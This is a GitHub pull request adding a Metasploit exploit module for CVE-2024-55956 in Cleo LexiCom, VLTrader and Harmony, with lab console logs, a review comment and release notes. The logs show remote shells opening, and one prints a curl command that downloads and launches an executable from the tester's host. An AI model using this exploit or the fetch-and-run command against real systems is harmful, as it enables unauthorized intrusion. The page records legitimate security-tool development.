Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Cleo LexiCom, VLTrader, and Harmony Unauthenticated Remote Code Execution (CVE-2024-55956) #19793

Merged
merged 8 commits into from
Jan 15, 2025
Merged

Cleo LexiCom, VLTrader, and Harmony Unauthenticated Remote Code Execution (CVE-2024-55956) #19793

merged 8 commits into from
Jan 15, 2025

Conversation

sfewer-r7
Copy link
Contributor

This pull request adds an exploit module for CVE-2024-55956, an unauth file write vulnerability affecting Cleo LexiCom, VLTrader, and Harmony versions 5.8.0.23 and below.

For a full technical analysis please read our AttackerKB Rapid7 Analysis.

The module supports both native Java payloads (i.e. Java Meterpreter), as well as command payloads for both Windows and Linux targets (so Fetch based native Meterpreter et al.).

Example

msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set RHOSTS 192.168.86.50
RHOSTS => 192.168.86.50
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set LHOST eth0
LHOST => 192.168.86.42
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set target 0
target => 1
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > show options 

Module options (exploit/multi/http/cleo_rce_cve_2024_55956):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.86.50    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    5080             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.86.42    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > check
[*] 192.168.86.50:5080 - The target appears to be vulnerable. Cleo LexiCom/5.8.0.0 (Windows Server 2022)
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > exploit 
[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Cleo LexiCom/5.8.0.0 (Windows Server 2022)
[*] Sending stage (58073 bytes) to 192.168.86.50
[+] Deleted temp/iidqizro
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:59172) at 2024-12-17 13:40:58 +0000
[!] This exploit may require manual cleanup of 'temp/kagdkplw' on the target

meterpreter > getuid
Server username: WIN-V28QNSO2H05$
meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows Server 2022 10.0 (amd64)
Architecture    : x64
System Language : en_IE
Meterpreter     : java/windows
meterpreter > pwd
C:\LexiCom
meterpreter >

jvoisin
jvoisin reviewed Jan 8, 2025
View reviewed changes
modules/exploits/multi/http/cleo_rce_cve_2024_55956.rb Outdated

# We expect the server to respond with an HTTP Server header like "Cleo LexiCom/5.8.0.0 (Windows Server 2022)".
# Note, the target product may be either LexiCom, VLTrader, or Harmony.
if res.headers.key?('Server') && (res.headers['Server'] =~ %r{cleo\s+(\blexicom\b|\bvltrader\b|\bharmony\b)/(\d+\.\d+\.\d+\.\d+)}i)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Are the \b really needed? Also, (?:…) can be used to have a non-matching group.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Good call on both of these! I added commit 4d42c78 to resolve this. Thank you @jvoisin :)

modules/exploits/multi/http/cleo_rce_cve_2024_55956.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/cleo_rce_cve_2024_55956.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/cleo_rce_cve_2024_55956.rb Outdated Show resolved Hide resolved
@bwatters-r7 bwatters-r7 self-assigned this Jan 15, 2025
@bwatters-r7
Copy link
Contributor

Win 2019x64

msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set rhost 10.5.132.130
rhost => 10.5.132.130
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set target 0
target => 0
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > show options

Module options (exploit/multi/http/cleo_rce_cve_2024_55956):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.5.132.130     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    5080             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > set verbose true
verbose => true
msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > run
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Cleo LexiCom/5.8.0.0 (Windows Server 2019)
[*] Sending stage (58073 bytes) to 10.5.132.130
[+] Deleted temp/wzggssyz
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.130:49785) at 2025-01-15 15:00:04 -0600
[!] This exploit may require manual cleanup of 'temp/fnzddovc' on the target

meterpreter > sysinfo
Computer        : Win2019__4cb9
OS              : Windows Server 2019 10.0 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/windows
meterpreter > getuid
Server username: WIN2019__4CB9$
meterpreter >

@bwatters-r7
Copy link
Contributor

Command injection

msf6 exploit(multi/http/cleo_rce_cve_2024_55956) > run
[*] Command to run on remote host: curl -so %TEMP%\qUPlZdbNyIMY.exe http://10.5.135.201:8080/h8r3u5VU3v-qeqUW3_anLw & start /B %TEMP%\qUPlZdbNyIMY.exe
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /h8r3u5VU3v-qeqUW3_anLw
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Cleo LexiCom/5.8.0.0 (Windows Server 2019)
[*] Client 10.5.132.130 requested /h8r3u5VU3v-qeqUW3_anLw
[*] Sending payload to 10.5.132.130 (curl/7.55.1)
[+] Deleted temp/bfnvqqta
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.130:49793) at 2025-01-15 15:03:06 -0600

meterpreter > sysinfo
Computer        : WIN2019__4CB9
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

@bwatters-r7 bwatters-r7 merged commit 9bd8590 into rapid7:master Jan 15, 2025
37 checks passed
@bwatters-r7
Copy link
Contributor

bwatters-r7 commented Jan 15, 2025
edited by adfoster-r7
Loading

Release Notes

Add an exploit module for CVE-2024-55956, an unauthenticated file write vulnerability affecting Cleo LexiCom, VLTrader, and Harmony versions 5.8.0.23 and below.

@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label Jan 16, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@jvoisin jvoisin jvoisin left review comments

@bwatters-r7 bwatters-r7 bwatters-r7 approved these changes

Assignees

@bwatters-r7 bwatters-r7

Labels
rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@sfewer-r7 @bwatters-r7 @jvoisin